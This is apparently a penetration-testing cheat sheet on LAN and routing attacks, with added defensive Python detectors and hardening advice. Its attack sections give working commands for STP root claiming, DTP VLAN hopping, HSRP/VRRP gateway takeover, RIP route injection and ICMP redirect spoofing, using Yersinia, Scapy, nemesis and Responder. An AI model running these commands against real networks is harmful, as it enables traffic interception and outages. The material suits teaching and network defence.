VLANs & Wired networking
Spanning Tree Protocol (STP) & Bridge Protocol Data Unit (BPDU):
Yersinia
result:
┌── yersinia 0.7.3 by Slay & tomac - STP mode ─────────────────────[10:29:40]┐
│ RootId BridgeId Port Iface Last seen │
│ 5080.760F0E13AC58 CB09.E7CD90117CAA 8002 eth1 26 Aug 10:29:39 │
│ 5080.760F0E14AC58 CB09.E7CD90127CAA 8002 eth2 26 Aug 10:29:38 │
Bridge two adapters (one into each switch; this requires two interfaces):
# bridge adapters
ettercap -T -i eth1 -B eth2 -q
# Run Yersinia in interactive (ncurses) mode
yersinia -I
# Select Spanning Tree Protocol
g
# x opens the attack menu; attack 4 is "Claiming Root Role" :)
x
4
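The root-role claim above works because any bridge that advertises a numerically lower (priority, MAC) root identifier wins the election, and access ports normally never carry BPDUs at all. The following is an added example, not part of the original page or of Yersinia: a pure-stdlib Python BPDU parser plus the two checks a switch implements as BPDU Guard and Root Guard, run over constructed sample BPDUs. The port names, the expected root bridge and the access-port set are assumptions made up for the example; the bridge-ID notation matches the RootId/BridgeId columns in the yersinia output.

```python
import struct
from dataclasses import dataclass

BPDU_LEN = 35  # IEEE 802.1D configuration BPDU, excluding the 3-byte LLC header


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def bridge_id_str(priority: int, mac: bytes) -> str:
    # Same "PRIO.MAC" notation yersinia prints in its RootId/BridgeId columns
    return f"{priority:04X}.{mac.hex().upper()}"


@dataclass
class Bpdu:
    version: int
    bpdu_type: int
    root_priority: int
    root_mac: bytes
    root_path_cost: int
    bridge_priority: int
    bridge_mac: bytes
    port_id: int

    @property
    def root_id(self):
        # Lower tuple wins the root election (priority first, then MAC)
        return (self.root_priority, self.root_mac)


def parse_bpdu(payload: bytes) -> Bpdu:
    """Parse a configuration (0x00) or RST (0x02) BPDU; TCN BPDUs carry no IDs."""
    if len(payload) < BPDU_LEN:
        raise ValueError("truncated BPDU")
    proto, version, bpdu_type, _flags = struct.unpack_from("!HBBB", payload, 0)
    if proto != 0 or bpdu_type not in (0x00, 0x02):
        raise ValueError("not a configuration/RST BPDU")
    root_prio, root_mac, cost = struct.unpack_from("!H6sI", payload, 5)
    bridge_prio, bridge_mac, port_id = struct.unpack_from("!H6sH", payload, 17)
    return Bpdu(version, bpdu_type, root_prio, root_mac, cost,
                bridge_prio, bridge_mac, port_id)


def build_config_bpdu(root_prio, root_mac, cost, bridge_prio, bridge_mac,
                      port_id=0x8001) -> bytes:
    """Constructed sample BPDU: max age 20 s, hello 2 s, forward delay 15 s (1/256 s units)."""
    return struct.pack("!HBBBH6sIH6sHHHHH", 0, 0, 0x00, 0x00,
                       root_prio, mac_bytes(root_mac), cost,
                       bridge_prio, mac_bytes(bridge_mac), port_id,
                       0, 20 * 256, 2 * 256, 15 * 256)


def check_bpdu(port: str, payload: bytes, expected_root, access_ports) -> list:
    """expected_root is the (priority, mac_bytes) of the bridge that should remain root."""
    alerts = []
    if port in access_ports:
        # End hosts never legitimately speak STP: this is what BPDU Guard err-disables
        alerts.append(f"{port}: BPDU received on access port")
    bpdu = parse_bpdu(payload)
    if bpdu.root_id < expected_root:
        # A superior root claim from a non-root port is what Root Guard blocks
        alerts.append(f"{port}: superior root claim {bridge_id_str(*bpdu.root_id)} "
                      f"from bridge {bridge_id_str(bpdu.bridge_priority, bpdu.bridge_mac)}")
    return alerts


# Assumed topology for the example (constructed values)
EXPECTED_ROOT = (0x8000, mac_bytes("00:11:22:33:44:55"))
ACCESS_PORTS = {"Gi1/0/5", "Gi1/0/6"}


def demo() -> dict:
    legit = build_config_bpdu(0x8000, "00:11:22:33:44:55", 4, 0x8000, "00:aa:bb:cc:dd:01")
    rogue = build_config_bpdu(0x0000, "00:de:ad:be:ef:01", 0, 0x0000, "00:de:ad:be:ef:01")
    return {
        "trunk_legit": check_bpdu("Gi1/0/48", legit, EXPECTED_ROOT, ACCESS_PORTS),
        "access_rogue": check_bpdu("Gi1/0/5", rogue, EXPECTED_ROOT, ACCESS_PORTS),
    }


if __name__ == "__main__":
    for name, alerts in demo().items():
        print(name, alerts or "ok")
```

The two checks map directly onto the switch features that stop this attack: BPDU Guard on every access port, Root Guard on the ports facing downstream switches, and a deliberately low priority on the bridge that is meant to stay root so that no default-priority device can out-bid it.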
Dynamic Trunking Protocol (DTP)
git clone https://github.com/commonexploits/dtpscan.git
cd dtpscan/
chmod a+x dtpscan.sh
./dtpscan.sh
result:
[-] Now Sniffing DTP packets on interface eth1 for 90 seconds.
[+] DTP was found enabled in it's default state of 'Auto'.
[+] VLAN hopping will be possible.
Run Yersinia:
yersinia -I
# select adapter
g
# select DTP
l
# see data from available VLANs using the 802.1Q menu
g
# this reveals the VLAN IDs in use, e.g.:
┌── yersinia 0.7.3 by Slay & tomac - 802.1Q mode ────────────────[15:00:08]┐
│ VLAN L2Prot Src IP Dst IP IP Prot Iface Last seen │
│ 0250 ARP 10.121.5.1 10.121.5.17? UKN eth1 11 Aug 14:51:00 │
│ 0250 ARP 10.121.5.235 10.121.5.1? UKN eth1 11 Aug 14:52:13 │
│ 0250 ARP 10.121.5.87 10.121.5.1? UKN eth1 11 Aug 14:52:20 │
With VLAN 250 identified, tag eth1 into it and scan it:
modprobe 8021q
# add vlan (vconfig is deprecated on current distros; the equivalent is
# ip link add link eth1 name eth1.250 type vlan id 250)
vconfig add eth1 250
# reset DHCP
dhclient eth1.250
#check
ifconfig eth1.250
# scan
arp-scan -I eth1.250 10.121.5.0/24
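On the wire, the hop above is nothing more than a frame carrying an 802.1Q tag (TPID 0x8100, VLAN ID in the low 12 bits of the TCI) from a port that should only ever see untagged traffic, and double-tagging variants stack two such tags. The following is an added example, not part of the original page or of Yersinia/dtpscan: a stdlib-only Python tag walker plus a per-port policy check that flags tagged frames on access ports, stacked tags, and VLAN IDs that are not allowed on a trunk, run over constructed sample frames. The port names and the policy table are assumptions made up for the example.

```python
import struct

TAG_TPIDS = (0x8100, 0x88A8, 0x9100)  # 802.1Q, 802.1ad (QinQ) and legacy QinQ TPIDs

# Constructed port policy, assumed for the example: what each switch port should carry
PORT_POLICY = {
    "Gi1/0/5":  {"mode": "access", "vlan": 10},
    "Gi1/0/48": {"mode": "trunk", "allowed": {10, 20, 250}},
}


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def build_frame(dst, src, vids, ethertype=0x0806, payload=b"\x00" * 28) -> bytes:
    """Constructed sample frame: every entry in vids becomes an 802.1Q tag, outermost first."""
    frame = mac_bytes(dst) + mac_bytes(src)
    for vid in vids:
        frame += struct.pack("!HH", 0x8100, vid & 0x0FFF)
    return frame + struct.pack("!H", ethertype) + payload


def parse_vlan_tags(frame: bytes):
    """Return (src_mac, [vid, ...], inner_ethertype), walking every stacked tag."""
    if len(frame) < 14:
        raise ValueError("runt frame")
    src = frame[6:12]
    offset, vids = 12, []
    while True:
        if offset + 2 > len(frame):
            raise ValueError("truncated header")
        ethertype = struct.unpack_from("!H", frame, offset)[0]
        if ethertype not in TAG_TPIDS:
            return src, vids, ethertype
        if offset + 4 > len(frame):
            raise ValueError("truncated VLAN tag")
        tci = struct.unpack_from("!H", frame, offset + 2)[0]
        vids.append(tci & 0x0FFF)  # PCP (3 bits) and DEI (1 bit) sit above the 12-bit VID
        offset += 4


def check_frame(port: str, frame: bytes) -> list:
    policy = PORT_POLICY[port]
    src, vids, _ = parse_vlan_tags(frame)
    src_str = ":".join(f"{b:02x}" for b in src)
    alerts = []
    if len(vids) >= 2:
        # Two stacked tags from a host port is the classic double-tagging indicator
        alerts.append(f"{port}: double-tagged frame from {src_str} vids={vids}")
    if policy["mode"] == "access" and vids:
        # Access ports should only receive untagged traffic for their one VLAN
        alerts.append(f"{port}: tagged frame (vid {vids[0]}) from {src_str} on access port")
    if policy["mode"] == "trunk" and vids and vids[0] not in policy["allowed"]:
        alerts.append(f"{port}: vid {vids[0]} from {src_str} not in trunk allowed list")
    return alerts


def demo() -> dict:
    bcast, host = "ff:ff:ff:ff:ff:ff", "00:aa:bb:cc:dd:01"
    return {
        "access_untagged": check_frame("Gi1/0/5", build_frame(bcast, host, [])),
        "access_tagged":   check_frame("Gi1/0/5", build_frame(bcast, host, [250])),
        "trunk_double":    check_frame("Gi1/0/48", build_frame(bcast, host, [10, 250])),
        "trunk_unknown":   check_frame("Gi1/0/48", build_frame(bcast, host, [999])),
    }


if __name__ == "__main__":
    for name, alerts in demo().items():
        print(name, alerts or "ok")
```

The policy table is the same information a hardened switch configuration encodes: `switchport mode access` plus `switchport nonegotiate` on host ports so DTP never leaves them in the "Auto" state dtpscan reports, an explicit `switchport trunk allowed vlan` list on trunks, and an unused VLAN as the trunk native VLAN so a double-tagged frame has nowhere to go.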
HSRP & VRRP
Hot Standby Router Protocol (HSRP)
scapy
>>> ip = IP(src='10.0.0.100', dst='224.0.0.2')
>>> udp = UDP()
>>> hsrp = HSRP(group=1, priority=255, virtualIP='10.0.0.1')
>>> send(ip/udp/hsrp, iface='eth1', inter=3, loop=1)
Result:
┌── yersinia 0.7.3 by Slay & tomac - HSRP mode ───────────────────[18:29:40]┐
│ SIP DIP Auth VIP Iface Last seen │
│ 10.0.0.2 224.0.0.2 abc123 10.0.0.1 eth1 26 Aug 18:28:09 │
│ 10.0.0.3 224.0.0.2 abc123 10.0.0.1 eth1 26 Aug 18:26:06 │
To include an authentication string in the HSRP packets, use the hsrp tool:
while (true); do (hsrp -i eth1 -d 224.0.0.2 -v 10.0.0.1 -a abc123 -g 1 -S 10.0.0.100; sleep 3); done
Virtual Router Redundancy Protocol (VRRP)
tcpdump
13:34:02 0:0:5e:0:1:1 1:0:5e:0:0:12 ip 60 10.0.0.7 > 224.0.0.18 VRRPv2-advertisement
20: vrid=1 prio=100 authtype=simple intv1=1 addrs: 10.0.0.8 auth "abc123" [tos 0xc0]
(ttl 244, id 0, len 40)
0x0000 45c0 0028 0000 0000 ff70 19e4 c0a8 0007 E..(.....p......
0x0010 e000 0012 2101 6401 0101 dd1f c0a8 0007 ....!.d.........
0x0020 6162 6331 3233 0000 0000 0000 0000 0000 abc123..........
You can then use Scapy to craft VRRP packets (VRRP rides directly on IP as protocol 112, not UDP, so the layers are IP/VRRP; the auth1/auth2 fields are 32-bit integers holding the 8-byte authentication string):
scapy
Welcome to Scapy (2.2.0)
>>> ip = IP(src='10.0.0.100', dst='224.0.0.18')
>>> vrrp = VRRP(vrid=1, priority=255, addrlist=["10.0.0.7", "10.0.0.8"], ipcount=2, auth1=0x61626331, auth2=0x32330000)  # 'abc1' + '23\0\0' = "abc123"
>>> send(ip/vrrp, iface='eth1', inter=3, loop=1)
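Both the HSRP and the VRRP takeovers above rely on the same two facts: the legitimate routers accept a hello from any source on the multicast group, and the plaintext authentication string (abc123 in the captures) is readable by whoever can sniff the segment, so it adds no real protection. The following is an added example, not part of the original page, of Yersinia or of Scapy: stdlib-only Python parsers for HSRPv1 (UDP/1985) and VRRPv2 (IP protocol 112) advertisements, with the VRRP checksum verified, feeding a monitor that alerts on advertisements from unknown routers, maximum-priority claims, coups and unexpected virtual IPs. The router allow-list, expected VIP and sample packets are constructed assumptions for the example.

```python
import socket
import struct

KNOWN_ROUTERS = {"10.0.0.2", "10.0.0.3"}  # constructed allow-list of the real gateways
EXPECTED_VIP = "10.0.0.1"


def ip4(addr: str) -> bytes:
    return socket.inet_aton(addr)


def ip4str(raw: bytes) -> str:
    return socket.inet_ntoa(raw)


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum; returns 0 when run over data that already carries it."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


# HSRPv1: version, opcode (0 hello, 1 coup, 2 resign), state, hello, hold,
# priority, group, reserved, 8-byte auth, virtual IP  (20 bytes, no checksum)
def build_hsrp(priority, group, vip, auth=b"cisco", opcode=0, state=16) -> bytes:
    return struct.pack("!BBBBBBBB8s4s", 0, opcode, state, 3, 10, priority, group, 0,
                       auth.ljust(8, b"\x00"), ip4(vip))


def parse_hsrp(payload: bytes) -> dict:
    if len(payload) < 20:
        raise ValueError("truncated HSRP")
    ver, op, state, _h, _hold, prio, group, _r, auth, vip = struct.unpack_from("!BBBBBBBB8s4s", payload, 0)
    return {"version": ver, "opcode": op, "state": state, "priority": prio,
            "group": group, "auth": auth.rstrip(b"\x00"), "vip": ip4str(vip)}


# VRRPv2: version/type (0x21), vrid, priority, count, authtype, adv interval,
# checksum, N virtual IPs, 8-byte auth string
def build_vrrp(priority, vrid, vips, auth=b"") -> bytes:
    head = struct.pack("!BBBBBBH", 0x21, vrid, priority, len(vips), 1 if auth else 0, 1, 0)
    body = b"".join(ip4(v) for v in vips) + auth.ljust(8, b"\x00")
    return head[:6] + struct.pack("!H", inet_checksum(head + body)) + body


def parse_vrrp(payload: bytes) -> dict:
    vt, vrid, prio, count, authtype, _adv, _ck = struct.unpack_from("!BBBBBBH", payload, 0)
    if vt >> 4 != 2 or vt & 0x0F != 1:
        raise ValueError("not a VRRPv2 advertisement")
    end = 16 + 4 * count
    if len(payload) < end:
        raise ValueError("truncated VRRP")
    vips = [ip4str(payload[8 + 4 * i: 12 + 4 * i]) for i in range(count)]
    return {"vrid": vrid, "priority": prio, "authtype": authtype, "vips": vips,
            "auth": payload[8 + 4 * count: end].rstrip(b"\x00"),
            "checksum_ok": inet_checksum(payload[:end]) == 0}


def check_fhrp(proto: str, src_ip: str, payload: bytes) -> list:
    alerts = []
    if proto == "hsrp":
        m = parse_hsrp(payload)
        prio, vip = m["priority"], m["vip"]
        if m["opcode"] == 1:
            alerts.append(f"hsrp: coup from {src_ip}")
    else:
        m = parse_vrrp(payload)
        prio, vip = m["priority"], (m["vips"][0] if m["vips"] else None)
        if not m["checksum_ok"]:
            alerts.append(f"vrrp: bad checksum from {src_ip}")
    if src_ip not in KNOWN_ROUTERS:
        alerts.append(f"{proto}: advertisement from unknown source {src_ip}")
    if prio >= 255:
        # 255 is the maximum (and in VRRP reserved for the address owner); takeover tools use it
        alerts.append(f"{proto}: maximum priority {prio} advertised by {src_ip}")
    if vip != EXPECTED_VIP:
        alerts.append(f"{proto}: unexpected virtual IP {vip} from {src_ip}")
    return alerts


def demo() -> dict:
    legit_vrrp = build_vrrp(100, 1, ["10.0.0.1"], b"abc123")
    tampered = bytearray(legit_vrrp)
    tampered[2] = 255  # priority changed without fixing the checksum
    return {
        "hsrp_legit": check_fhrp("hsrp", "10.0.0.2", build_hsrp(100, 1, "10.0.0.1", b"abc123")),
        "hsrp_rogue": check_fhrp("hsrp", "10.0.0.100", build_hsrp(255, 1, "10.0.0.1", b"abc123")),
        "vrrp_legit": check_fhrp("vrrp", "10.0.0.3", legit_vrrp),
        "vrrp_rogue": check_fhrp("vrrp", "10.0.0.100", build_vrrp(255, 1, ["10.0.0.1"], b"abc123")),
        "vrrp_tampered": check_fhrp("vrrp", "10.0.0.3", bytes(tampered)),
    }


if __name__ == "__main__":
    for name, alerts in demo().items():
        print(name, alerts or "ok")
```

Since the source address is trivially spoofed, the allow-list check is only a tripwire; the durable fixes are MD5/key-chain authentication for HSRP, a priority on the intended active router that no default-configured device can exceed, and ACLs or control-plane policing that drop UDP/1985 and protocol 112 arriving on host-facing ports.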
Routing Information Protocol (RIP)
Three versions:
RIPv1
nemesis rip -c 2 -V 1 -a 1 -i 10.2.0.10 -m 1 -S 10.0.0.100 -D 10.0.0.5
RIPv2
nemesis rip -c 2 -V 2 -a 1 -i 10.2.0.10 -k 0xffffffff -m 1 -S 10.0.0.100 -D 10.0.0.5
RIPng (IPv6)
scapy
>>> load_contrib("ripng")
>>> ip = IPv6(src="2001:1234:cafe:babe::1", dst="ff02::9")
>>> udp = UDP()
>>> ripng = RIPngEntry(prefix="2001:1234:dead:beef::/64", nexthop="2001:1234:cafe:babe::1")
>>> send(ip/udp/ripng, iface='eth0', inter=3, loop=1)
Enhanced Interior Gateway Routing Protocol (EIGRP)
TBC
Open Shortest Path First (OSPF)
TBC
Internet Control Message Protocol (ICMP) redirect spoofing
cd /usr/share/responder/
chmod a+x Icmp-Redirect.py
./Icmp-Redirect.py -I eth0 -i 10.0.0.100 -g 10.0.0.1 -t 10.0.0.5 -r 10.2.0.10
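An ICMP redirect (type 5) tells a host to send traffic for a destination via a different gateway on the same link; the tool invocation above spoofs one from the gateway (-g) so that the target (-t) routes the destination (-r) through the attacker (-i). The following is an added example, not part of the original page or of Responder: a stdlib-only Python parser for redirect messages, a check that validates the proposed gateway against a trusted-router list (the source-address check alone is defeated by the spoofing shown above, the gateway allow-list is not), and an audit of `sysctl -a` style output for interfaces that still accept redirects. The gateway list, addresses and the sysctl sample are constructed assumptions for the example.

```python
import socket
import struct

DEFAULT_GATEWAY = "10.0.0.1"                      # constructed, assumed for the example
TRUSTED_ROUTERS = {"10.0.0.1", "10.0.0.254"}      # the only gateways a redirect may name


def ip4(addr: str) -> bytes:
    return socket.inet_aton(addr)


def ip4str(raw: bytes) -> str:
    return socket.inet_ntoa(raw)


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum; 0 when run over data that already carries it."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src: str, dst: str, proto=6, length=40) -> bytes:
    """Constructed minimal IPv4 header (no options, header checksum left zero)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, length, 0, 0, 64, proto, 0, ip4(src), ip4(dst))


def build_icmp_redirect(new_gateway: str, orig_src: str, orig_dst: str, code=1) -> bytes:
    """Constructed ICMP redirect: type 5, code 1 = redirect for host, quoting the original header + 8 bytes."""
    quoted = build_ipv4_header(orig_src, orig_dst) + b"\x00" * 8
    msg = struct.pack("!BBH4s", 5, code, 0, ip4(new_gateway)) + quoted
    return msg[:2] + struct.pack("!H", inet_checksum(msg)) + msg[4:]


def parse_icmp_redirect(payload: bytes) -> dict:
    if len(payload) < 28:
        raise ValueError("truncated ICMP redirect")
    icmp_type, code, _ck, gw = struct.unpack_from("!BBH4s", payload, 0)
    if icmp_type != 5:
        raise ValueError("not an ICMP redirect")
    quoted = payload[8:]  # the original datagram's IP header: src at 12..16, dst at 16..20
    return {"code": code, "gateway": ip4str(gw),
            "orig_src": ip4str(quoted[12:16]), "orig_dst": ip4str(quoted[16:20]),
            "checksum_ok": inet_checksum(payload) == 0}


def check_redirect(sender_ip: str, payload: bytes) -> list:
    m = parse_icmp_redirect(payload)
    alerts = []
    if not m["checksum_ok"]:
        alerts.append(f"bad ICMP checksum from {sender_ip}")
    if sender_ip != DEFAULT_GATEWAY:
        alerts.append(f"redirect from {sender_ip}, which is not the configured gateway")
    if m["gateway"] not in TRUSTED_ROUTERS:
        alerts.append(f"redirect steers {m['orig_dst']} to untrusted gateway {m['gateway']}")
    return alerts


def audit_accept_redirects(sysctl_text: str) -> list:
    """Keys from `sysctl -a` output where ICMP redirects are still honoured.
    On a non-forwarding Linux host either the 'all' or the per-interface key being 1
    is enough for the kernel to accept them, so every non-zero key is reported."""
    offenders = []
    for line in sysctl_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().endswith(".accept_redirects") and value.strip() != "0":
            offenders.append(key.strip())
    return offenders


# Constructed sample of `sysctl -a` output for the audit
SAMPLE_SYSCTL = """\
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 1
net.ipv4.conf.eth0.accept_redirects = 1
net.ipv4.conf.all.send_redirects = 0
"""


def demo() -> dict:
    return {
        "legit": check_redirect("10.0.0.1", build_icmp_redirect("10.0.0.254", "10.0.0.5", "10.2.0.10")),
        "rogue_gateway": check_redirect("10.0.0.1", build_icmp_redirect("10.0.0.100", "10.0.0.5", "10.2.0.10")),
        "rogue_sender": check_redirect("10.0.0.100", build_icmp_redirect("10.0.0.100", "10.0.0.5", "10.2.0.10")),
        "sysctl": audit_accept_redirects(SAMPLE_SYSCTL),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result or "ok")
```

The simplest mitigation is to stop honouring redirects at all on hosts that have a single gateway: set `net.ipv4.conf.all.accept_redirects` and the per-interface keys to 0 (and `send_redirects` to 0 on anything that is not a router), which is what the audit function checks for.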